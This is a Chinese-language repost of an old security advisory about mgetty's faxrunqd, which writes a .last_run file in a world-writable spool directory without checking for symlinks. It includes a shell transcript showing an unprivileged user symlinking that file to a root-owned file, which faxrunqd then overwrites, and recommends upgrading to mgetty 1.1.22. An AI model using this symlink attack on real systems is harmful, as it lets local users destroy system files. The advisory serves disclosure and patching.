IT貓撲網(wǎng):您身邊最放心的安全下載站! 最新更新|軟件分類|軟件專題|手機版|論壇轉(zhuǎn)貼|軟件發(fā)布

您當(dāng)前所在位置: 首頁系統(tǒng)集成網(wǎng)絡(luò)故障 → Linux faxrunqd文件創(chuàng)建問題導(dǎo)致拒絕服務(wù)攻擊

Linux faxrunqd文件創(chuàng)建問題導(dǎo)致拒絕服務(wù)攻擊

時間:2015-06-28 00:00:00 來源:IT貓撲網(wǎng) 作者:網(wǎng)管聯(lián)盟 我要評論(3)

  受影響系統(tǒng):

  mgetty 1.1.21以及更低版本

  - Linux redhat 6.2以及更低版本

  - Linux-Mandrake 7.1 以及更低版本

  - 其他使用有問題mgetty的unix系統(tǒng)

  不受影響系統(tǒng):

  mgetty 1.1.22

  描述:

  mgetty中帶了一個faxrunqd程序,它用來發(fā)送faxspool(1)產(chǎn)生的傳真隊列中的任務(wù)。

  在執(zhí)行時,該程序會在/var/spool/outgoing/目錄下創(chuàng)建一個.last_run文件,這個目錄是任何人可寫的。在某些mgetty版本中所帶的faxrunqd沒有檢查該文件是否存在或是鏈接文件,因此攻擊者可能覆蓋任意系統(tǒng)文件,造成拒絕服務(wù)攻擊。

  <* 來源: Stan Bubrouski ([email protected])*>

  測試方法:

  警 告

  以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用。使用者風(fēng)險自負!

  [user@king /tmp]$ id

  uid=200(user) gid=100(users) groups=100(users)

  [user@king /tmp]$ ls -al /var/spool/fax/outgoing

  total 3

  drwxrwxrwt 3 root root 1024 Jun 2 18:46 .

  drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..

  drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

  [user@king /tmp]$ ls -al /etc/smash_me

  -rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me

  [user@king /tmp]$ cat /etc/smash_me

  Smash me!!!

  [user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run

  [user@king /tmp]$ ls -al /var/spool/fax/outgoing

  total 3

  drwxrwxrwt 3 root root 1024 Jun 2 18:48 .

  drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..

  lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->

  /etc/smash_me

  drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

  Root console:

  [root@king /tmp]# faxrunqd -l ttyS0

  ...

  Remote unprivilaged user:

  [user@king /tmp]$ ls -al /var/spool/fax/outgoing

  total 3

  drwxrwxrwt 3 root root 1024 Jun 2 18:48 .

  drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..

  lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->

  /etc/smash_me

  drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

  [user@king /tmp]$ ls -al /etc/smash_me

  -rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me

  [user@king /tmp]$ cat /etc/smash_me

  Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd

  建議:

  mgetty 1.1.22已經(jīng)解決了這個問題,您可以在下列地址下載:http://alpha.greenie.net/mgetty/

關(guān)鍵詞標(biāo)簽:拒絕服務(wù)攻擊,Linux,f

相關(guān)閱讀

文章評論
發(fā)表評論

熱門文章 提示dns服務(wù)錯誤怎么辦 dns錯誤問題多種解決方法 提示dns服務(wù)錯誤怎么辦 dns錯誤問題多種解決方法 “無法瀏覽網(wǎng)頁” 十招解決疑難雜癥 “無法瀏覽網(wǎng)頁” 十招解決疑難雜癥 路由器無線不能上網(wǎng)等故障排除 路由器無線不能上網(wǎng)等故障排除 解決VPN路由設(shè)置不能訪問外網(wǎng)的問題 解決VPN路由設(shè)置不能訪問外網(wǎng)的問題

相關(guān)下載

    人氣排行 解決VPN路由設(shè)置不能訪問外網(wǎng)的問題 登錄SSH服務(wù)器失敗問題的分析及解決 光纖上網(wǎng) 路由器設(shè)置頁面進不去怎么辦 核心交換機故障現(xiàn)象及解決辦法 無線網(wǎng)卡連接不上怎么辦_無線網(wǎng)卡連接不上解決方法 路由設(shè)置不當(dāng) 導(dǎo)致VPN無法訪問外網(wǎng) 提示dns服務(wù)錯誤怎么辦 dns錯誤問題多種解決方法 徹底避免環(huán)路問題 正確配置交換機步驟